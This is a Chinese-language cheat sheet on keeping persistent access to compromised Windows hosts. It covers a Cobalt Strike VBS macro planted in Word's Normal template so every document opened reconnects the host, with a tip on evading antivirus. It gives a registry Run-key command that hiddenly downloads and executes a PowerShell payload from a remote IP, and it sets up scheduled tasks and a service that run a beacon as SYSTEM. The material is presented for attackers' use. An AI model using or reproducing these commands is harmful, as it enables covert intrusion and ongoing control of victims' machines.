权限维持新老技术

参考资料

权限维持相关

---

静默宏木马

可以使用静默宏木马进行权限维持。利用cs创建宏木马插入docx文件中。

制作方法
1.利用CS生成vbs代码


2.创建一个docx文档并创建宏且将宏的位置设置为对所有的活动模版和文档，如下图所示

3.将恶意vbs代码加入到Nomal的This Document模块

4.保存文件并运行，主机上线，且以后这个电脑上的任意word文档打开后都会上线，除非删掉这个宏配置。

tips
杀软对doc文件杀软查杀力度远大于对docx文件的。

参考
静默宏木马进行权限维持

---

启动项添加

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v “Keyname” /t REG_SZ /d “powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://172.16.99.148:80/a1’))”” /f

---

计划任务

#登录时运行
SchTasks /Create /SC ONLOGON /TN “hacker” /ru “system” /tr “C:\Users\Administrator\Desktop\beacon.exe”
#每分钟运行一次
schtasks /create /sc minute /mo 1 /tn “hacker” /ru “system” /tr “C:\Users\Administrator\Desktop\beacon.exe”

参考
玩转计划任务schtasks

---

创建服务

sc create HelloWindowsService binpath= “C:\Program Files\1.exe” start= system displayname= “HelloWindowsService”

---

附录

常用注册表路径

用户级
\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
系统级
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce

参考
cmd命令行中常见的注册表操作